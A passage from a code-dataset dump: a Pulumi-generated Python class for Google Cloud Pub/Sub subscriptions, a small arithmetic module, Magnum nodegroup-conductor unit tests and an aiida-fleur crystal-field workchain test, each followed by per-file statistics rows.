:param pulumi.Input[pulumi.InputType['ExpirationPolicyArgs']] expiration_policy: A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
:param pulumi.Input[str] filter: An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: See Creating and managing labels.
:param pulumi.Input[str] message_retention_duration: How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
:param pulumi.Input[str] name: The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
:param pulumi.Input[pulumi.InputType['PushConfigArgs']] push_config: If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
:param pulumi.Input[bool] retain_acked_messages: Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp] (https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
:param pulumi.Input[pulumi.InputType['RetryPolicyArgs']] retry_policy: A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
:param pulumi.Input[str] topic: The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SubscriptionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Creates a subscription to a given topic. See the [resource name rules] (https://cloud.google.com/pubsub/docs/admin#resource_names). If the subscription already exists, returns `ALREADY_EXISTS`. If the corresponding topic doesn't exist, returns `NOT_FOUND`. If the name is not provided in the request, the server will assign a random name for this subscription on the same project as the topic, conforming to the [resource name format] (https://cloud.google.com/pubsub/docs/admin#resource_names). The generated name is populated in the returned Subscription object. Note that for REST API requests, you must specify a name in the request.
:param str resource_name: The name of the resource.
:param SubscriptionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SubscriptionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ack_deadline_seconds: Optional[pulumi.Input[int]] = None,
dead_letter_policy: Optional[pulumi.Input[pulumi.InputType['DeadLetterPolicyArgs']]] = None,
detached: Optional[pulumi.Input[bool]] = None,
enable_message_ordering: Optional[pulumi.Input[bool]] = None,
expiration_policy: Optional[pulumi.Input[pulumi.InputType['ExpirationPolicyArgs']]] = None,
filter: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
message_retention_duration: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
push_config: Optional[pulumi.Input[pulumi.InputType['PushConfigArgs']]] = None,
retain_acked_messages: Optional[pulumi.Input[bool]] = None,
retry_policy: Optional[pulumi.Input[pulumi.InputType['RetryPolicyArgs']]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SubscriptionArgs.__new__(SubscriptionArgs)
__props__.__dict__["ack_deadline_seconds"] = ack_deadline_seconds
__props__.__dict__["dead_letter_policy"] = dead_letter_policy
__props__.__dict__["detached"] = detached
__props__.__dict__["enable_message_ordering"] = enable_message_ordering
__props__.__dict__["expiration_policy"] = expiration_policy
__props__.__dict__["filter"] = filter
__props__.__dict__["labels"] = labels
__props__.__dict__["message_retention_duration"] = message_retention_duration
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["push_config"] = push_config
__props__.__dict__["retain_acked_messages"] = retain_acked_messages
__props__.__dict__["retry_policy"] = retry_policy
if subscription_id is None and not opts.urn:
raise TypeError("Missing required property 'subscription_id'")
__props__.__dict__["subscription_id"] = subscription_id
if topic is None and not opts.urn:
raise TypeError("Missing required property 'topic'")
__props__.__dict__["topic"] = topic
__props__.__dict__["state"] = None
__props__.__dict__["topic_message_retention_duration"] = None
super(Subscription, __self__).__init__(
'google-native:pubsub/v1:Subscription',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Subscription':
"""
Get an existing Subscription resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SubscriptionArgs.__new__(SubscriptionArgs)
__props__.__dict__["ack_deadline_seconds"] = None
__props__.__dict__["dead_letter_policy"] = None
__props__.__dict__["detached"] = None
__props__.__dict__["enable_message_ordering"] = None
__props__.__dict__["expiration_policy"] = None
__props__.__dict__["filter"] = None
__props__.__dict__["labels"] = None
__props__.__dict__["message_retention_duration"] = None
__props__.__dict__["name"] = None
__props__.__dict__["push_config"] = None
__props__.__dict__["retain_acked_messages"] = None
__props__.__dict__["retry_policy"] = None
__props__.__dict__["state"] = None
__props__.__dict__["topic"] = None
__props__.__dict__["topic_message_retention_duration"] = None
return Subscription(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="ackDeadlineSeconds")
def ack_deadline_seconds(self) -> pulumi.Output[int]:
"""
The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
"""
return pulumi.get(self, "ack_deadline_seconds")
@property
@pulumi.getter(name="deadLetterPolicy")
def dead_letter_policy(self) -> pulumi.Output['outputs.DeadLetterPolicyResponse']:
"""
A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscriptions's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
"""
return pulumi.get(self, "dead_letter_policy")
@property
@pulumi.getter
def detached(self) -> pulumi.Output[bool]:
"""
Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
"""
return pulumi.get(self, "detached")
@property
@pulumi.getter(name="enableMessageOrdering")
def enable_message_ordering(self) -> pulumi.Output[bool]:
"""
If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
"""
return pulumi.get(self, "enable_message_ordering")
@property
@pulumi.getter(name="expirationPolicy")
def expiration_policy(self) -> pulumi.Output['outputs.ExpirationPolicyResponse']:
"""
A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
"""
return pulumi.get(self, "expiration_policy")
@property
@pulumi.getter
def filter(self) -> pulumi.Output[str]:
"""
An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
"""
return pulumi.get(self, "filter")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Mapping[str, str]]:
"""
See Creating and managing labels.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="messageRetentionDuration")
def message_retention_duration(self) -> pulumi.Output[str]:
"""
How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
"""
return pulumi.get(self, "message_retention_duration")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="pushConfig")
def push_config(self) -> pulumi.Output['outputs.PushConfigResponse']:
"""
If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
"""
return pulumi.get(self, "push_config")
@property
@pulumi.getter(name="retainAckedMessages")
def retain_acked_messages(self) -> pulumi.Output[bool]:
"""
Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp] (https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
"""
return pulumi.get(self, "retain_acked_messages")
@property
@pulumi.getter(name="retryPolicy")
def retry_policy(self) -> pulumi.Output['outputs.RetryPolicyResponse']:
"""
A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
"""
return pulumi.get(self, "retry_policy")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
An output-only field indicating whether or not the subscription can receive messages.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter
def topic(self) -> pulumi.Output[str]:
"""
The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
"""
return pulumi.get(self, "topic")
@property
@pulumi.getter(name="topicMessageRetentionDuration")
def topic_message_retention_duration(self) -> pulumi.Output[str]:
"""
Indicates the minimum duration for which a message is retained after it is published to the subscription's topic. If this field is set, messages published to the subscription's topic in the last `topic_message_retention_duration` are always available to subscribers. See the `message_retention_duration` field in `Topic`. This field is set only in responses from the server; it is ignored if it is set in any requests.
"""
return pulumi.get(self, "topic_message_retention_duration")
| 77.614504
| 1,109
| 0.715097
| 5,379
| 40,670
| 5.256739
| 0.075851
| 0.043182
| 0.046364
| 0.020158
| 0.885203
| 0.841739
| 0.805206
| 0.778186
| 0.763085
| 0.735535
| 0
| 0.002885
| 0.198746
| 40,670
| 523
| 1,110
| 77.762906
| 0.864823
| 0.559897
| 0
| 0.430303
| 1
| 0
| 0.13893
| 0.046685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154545
| false
| 0.00303
| 0.021212
| 0.006061
| 0.275758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b6a1201f30627dab1592e8bdf50e36dea2b6323a
| 178
|
py
|
Python
|
tests/snacks/mypkgdemo2/module5.py
|
msakamoto-sf/pythonsnack
|
20de2be963caa486f0bde68dd75cf417bd7f28b9
|
[
"Apache-2.0"
] | 1
|
2020-03-12T09:38:01.000Z
|
2020-03-12T09:38:01.000Z
|
tests/snacks/mypkgdemo2/module5.py
|
msakamoto-sf/pythonsnack
|
20de2be963caa486f0bde68dd75cf417bd7f28b9
|
[
"Apache-2.0"
] | null | null | null |
tests/snacks/mypkgdemo2/module5.py
|
msakamoto-sf/pythonsnack
|
20de2be963caa486f0bde68dd75cf417bd7f28b9
|
[
"Apache-2.0"
] | null | null | null |
def module5_sub(n1, n2, n3, n4):
return n1 - n2 - n3 - n4
class ClassInModule5:
@staticmethod
def sub(n1, n2, n3, n4):
return n1 - n2 - n3 - n4 - 3
| 19.777778
| 37
| 0.539326
| 27
| 178
| 3.518519
| 0.444444
| 0.168421
| 0.252632
| 0.336842
| 0.526316
| 0.526316
| 0.526316
| 0.526316
| 0.526316
| 0.526316
| 0
| 0.162393
| 0.342697
| 178
| 8
| 38
| 22.25
| 0.649573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
fcbaba3670a3323bec362954b5c96c628a0be916
| 11,655
|
py
|
Python
|
magnum/tests/unit/conductor/handlers/test_nodegroup_conductor.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 319
|
2015-04-01T01:36:14.000Z
|
2022-01-18T13:21:46.000Z
|
magnum/tests/unit/conductor/handlers/test_nodegroup_conductor.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 10
|
2015-06-05T20:12:46.000Z
|
2018-10-17T09:14:22.000Z
|
magnum/tests/unit/conductor/handlers/test_nodegroup_conductor.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 254
|
2015-03-30T13:56:06.000Z
|
2022-03-26T03:40:22.000Z
|
# Copyright (c) 2018 European Organization for Nuclear Research.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from unittest.mock import patch
from heatclient import exc
from magnum.common import exception
from magnum.conductor.handlers import nodegroup_conductor
from magnum.objects import fields
from magnum.tests.unit.db import base as db_base
from magnum.tests.unit.objects import utils as obj_utils
class TestHandler(db_base.DbTestCase):
def setUp(self):
super(TestHandler, self).setUp()
self.handler = nodegroup_conductor.Handler()
self.cluster = obj_utils.create_test_cluster(self.context)
self.nodegroup = obj_utils.create_test_nodegroup(
self.context, cluster_id=self.cluster.uuid)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_create(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
nodegroup = mock.MagicMock()
self.handler.nodegroup_create(self.context, self.cluster, nodegroup)
mock_driver.create_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
nodegroup.create.assert_called_once()
nodegroup.save.assert_called_once()
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.CREATE_IN_PROGRESS,
nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_create_failed(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = NotImplementedError("Test failure")
mock_driver.create_nodegroup.side_effect = side_effect
nodegroup = mock.MagicMock()
self.assertRaises(NotImplementedError, self.handler.nodegroup_create,
self.context, self.cluster, nodegroup)
mock_driver.create_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
nodegroup.create.assert_called_once()
nodegroup.save.assert_called_once()
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.CREATE_FAILED,
nodegroup.status)
self.assertEqual("Test failure", nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_create_failed_bad_request(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = exc.HTTPBadRequest("Bad request")
mock_driver.create_nodegroup.side_effect = side_effect
nodegroup = mock.MagicMock()
self.assertRaises(exception.InvalidParameterValue,
self.handler.nodegroup_create,
self.context, self.cluster, nodegroup)
mock_driver.create_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
nodegroup.create.assert_called_once()
nodegroup.save.assert_called_once()
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.CREATE_FAILED,
nodegroup.status)
self.assertEqual("ERROR: Bad request", nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_udpate(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
self.handler.nodegroup_update(self.context, self.cluster,
self.nodegroup)
mock_driver.update_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_update_failed(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = NotImplementedError("Update failed")
mock_driver.update_nodegroup.side_effect = side_effect
self.assertRaises(NotImplementedError, self.handler.nodegroup_update,
self.context, self.cluster, self.nodegroup)
mock_driver.update_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.nodegroup.status)
self.assertEqual("Update failed", self.nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_update_failed_bad_request(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = exc.HTTPBadRequest("Bad request")
mock_driver.update_nodegroup.side_effect = side_effect
self.assertRaises(exception.InvalidParameterValue,
self.handler.nodegroup_update,
self.context, self.cluster, self.nodegroup)
mock_driver.update_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.nodegroup.status)
self.assertEqual("ERROR: Bad request", self.nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
self.handler.nodegroup_delete(self.context, self.cluster,
self.nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.DELETE_IN_PROGRESS,
self.nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_stack_not_found(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
nodegroup = mock.MagicMock()
mock_driver.delete_nodegroup.side_effect = exc.HTTPNotFound()
self.handler.nodegroup_delete(self.context, self.cluster, nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
nodegroup.destroy.assert_called_once()
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_stack_and_ng_not_found(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
nodegroup = mock.MagicMock()
mock_driver.delete_nodegroup.side_effect = exc.HTTPNotFound()
nodegroup.destroy.side_effect = exception.NodeGroupNotFound()
self.handler.nodegroup_delete(self.context, self.cluster, nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
nodegroup.destroy.assert_called_once()
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_stack_operation_ongoing(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
mock_driver.delete_nodegroup.side_effect = exc.HTTPConflict()
self.assertRaises(exception.NgOperationInProgress,
self.handler.nodegroup_delete,
self.context, self.cluster, self.nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.DELETE_IN_PROGRESS,
self.nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_delete_failed(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = NotImplementedError("Delete failed")
mock_driver.delete_nodegroup.side_effect = side_effect
self.assertRaises(NotImplementedError,
self.handler.nodegroup_delete,
self.context, self.cluster, self.nodegroup)
mock_driver.delete_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.DELETE_FAILED,
self.nodegroup.status)
self.assertEqual("Delete failed", self.nodegroup.status_reason)
| 53.219178
| 78
| 0.619648
| 1,158
| 11,655
| 5.982729
| 0.123489
| 0.05918
| 0.049798
| 0.069861
| 0.830543
| 0.82347
| 0.812644
| 0.794169
| 0.79157
| 0.79157
| 0
| 0.000993
| 0.309052
| 11,655
| 218
| 79
| 53.463303
| 0.859307
| 0.054311
| 0
| 0.743316
| 0
| 0
| 0.058145
| 0.045971
| 0
| 0
| 0
| 0
| 0.26738
| 1
| 0.064171
| false
| 0
| 0.042781
| 0
| 0.112299
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e198be70fb7a14fc20465bb3e0464b5c606b8f5
| 8,227
|
py
|
Python
|
tests/workflows/test_cfcoeff_workchain.py
|
broeder-j/aiida_fleur_plugin
|
cca54b194f4b217abb69aaa1fca0db52c6c830c3
|
[
"MIT"
] | 1
|
2017-02-07T12:31:38.000Z
|
2017-02-07T12:31:38.000Z
|
tests/workflows/test_cfcoeff_workchain.py
|
broeder-j/aiida_fleur_plugin
|
cca54b194f4b217abb69aaa1fca0db52c6c830c3
|
[
"MIT"
] | 16
|
2017-04-03T11:42:50.000Z
|
2017-05-18T16:25:39.000Z
|
tests/workflows/test_cfcoeff_workchain.py
|
broeder-j/aiida_fleur_plugin
|
cca54b194f4b217abb69aaa1fca0db52c6c830c3
|
[
"MIT"
] | null | null | null |
###############################################################################
# Copyright (c), Forschungszentrum Jülich GmbH, IAS-1/PGI-1, Germany. #
# All rights reserved. #
# This file is part of the AiiDA-FLEUR package. #
# #
# The code is hosted on GitHub at https://github.com/JuDFTteam/aiida-fleur #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.flapw.de or #
# http://aiida-fleur.readthedocs.io/en/develop/ #
###############################################################################
''' Contains tests for the FleurCFWorkchain '''
import pytest
import aiida_fleur
from aiida_fleur.workflows.cfcoeff import FleurCFCoeffWorkChain
from aiida import orm
from aiida.engine import run_get_node
from aiida.cmdline.utils.common import get_workchain_report, get_calcjob_report
import os
aiida_path = os.path.dirname(aiida_fleur.__file__)
@pytest.mark.regression_test
@pytest.mark.timeout(1000, method='thread')
def test_fleur_cfcoeff_structure_no_analogue(with_export_cache, fleur_local_code, inpgen_local_code,
generate_smco5_structure, clear_database, aiida_caplog):
"""
Full example using the CFCoeff workchain with just a structure as input.
Calls scf for analogue and rare-earth system
"""
options = {
'resources': {
'num_machines': 1,
'num_mpiprocs_per_machine': 1
},
'max_wallclock_seconds': 5 * 60,
'withmpi': False,
'custom_scheduler_commands': ''
}
FleurCode = fleur_local_code
desc = FleurCode.description
with_hdf5 = False
if desc is not None:
if 'hdf5' in desc:
with_hdf5 = True
elif 'Hdf5' in desc:
with_hdf5 = True
elif 'HDF5' in desc:
with_hdf5 = True
else:
with_hdf5 = False
if not with_hdf5:
pytest.skip('CFCoeff workchain only works with HDF5')
# create process builder to set parameters
builder = FleurCFCoeffWorkChain.get_builder()
builder.metadata.description = 'Simple Fleur CFcoeff test for SmCo5 bulk with structure data given'
builder.metadata.label = 'FleurCFCoeff_test_analogue'
builder.scf.fleur = FleurCode
builder.scf.options = orm.Dict(dict=options).store()
builder.scf.inpgen = inpgen_local_code
builder.scf.structure = generate_smco5_structure()
builder.scf.calc_parameters = orm.Dict(
dict={
'comp': {
'kmax': 3.0,
'gmax': 7.0,
'gmaxxc': 7.0
},
'exco': {
'xctyp': 'vwn'
},
'kpt': {
'div1': 1,
'div2': 1,
'div3': 1
}
})
builder.wf_parameters = orm.Dict(dict={'element': 'Sm'})
# now run calculation
#run_with_cache(builder)
data_dir_path = os.path.join(aiida_path,
'../tests/workflows/caches/fleur_cfcoeff_smco5_structure_no_analogue.tar.gz')
with with_export_cache(data_dir_abspath=data_dir_path):
out, node = run_get_node(builder)
#print(out)
#print(node)
print(get_workchain_report(node, 'REPORT'))
#assert node.is_finished_ok
# check output
n = out['output_cfcoeff_wc_para']
n = n.get_dict()
assert 'output_cfcoeff_wc_potentials' in out
assert 'output_cfcoeff_wc_charge_densities' in out
from pprint import pprint
pprint(n)
assert n['cf_coefficients_convention'] == 'Stevens'
assert n['cf_coefficients_site_symmetries'] == ['6/mmm']
assert n['angle_a_to_x_axis'] == 0.0
assert n['angle_c_to_z_axis'] == 0.0
assert sorted(n['cf_coefficients_spin_up'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
assert sorted(n['cf_coefficients_spin_down'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
keys = sorted(n['cf_coefficients_spin_up'].keys())
assert pytest.approx([n['cf_coefficients_spin_up'][key] for key in keys]) \
== [-530.07676884271, -51.531259261553, 91.429428364653,3.9379215268871, 91.429428364653]
assert pytest.approx([n['cf_coefficients_spin_down'][key] for key in keys]) \
== [-585.50088518635, 107.57251558557, 66.240659350976,2.8694095323364, 66.240659350976]
@pytest.mark.regression_test
@pytest.mark.timeout(1000, method='thread')
def test_fleur_cfcoeff_structure_analogue(with_export_cache, fleur_local_code, inpgen_local_code,
generate_smco5_structure, clear_database, aiida_caplog):
"""
Full example using the CFCoeff workchain with just a structure as input.
Calls scf for analogue and rare-earth system
"""
options = {
'resources': {
'num_machines': 1,
'num_mpiprocs_per_machine': 1
},
'max_wallclock_seconds': 5 * 60,
'withmpi': False,
'custom_scheduler_commands': ''
}
FleurCode = fleur_local_code
desc = FleurCode.description
with_hdf5 = False
if desc is not None:
if 'hdf5' in desc:
with_hdf5 = True
elif 'Hdf5' in desc:
with_hdf5 = True
elif 'HDF5' in desc:
with_hdf5 = True
else:
with_hdf5 = False
if not with_hdf5:
pytest.skip('CFCoeff workchain only works with HDF5')
# create process builder to set parameters
builder = FleurCFCoeffWorkChain.get_builder()
builder.metadata.description = 'Simple Fleur CFcoeff test for SmCo5 bulk with structure data given'
builder.metadata.label = 'FleurCFCoeff_test_analogue'
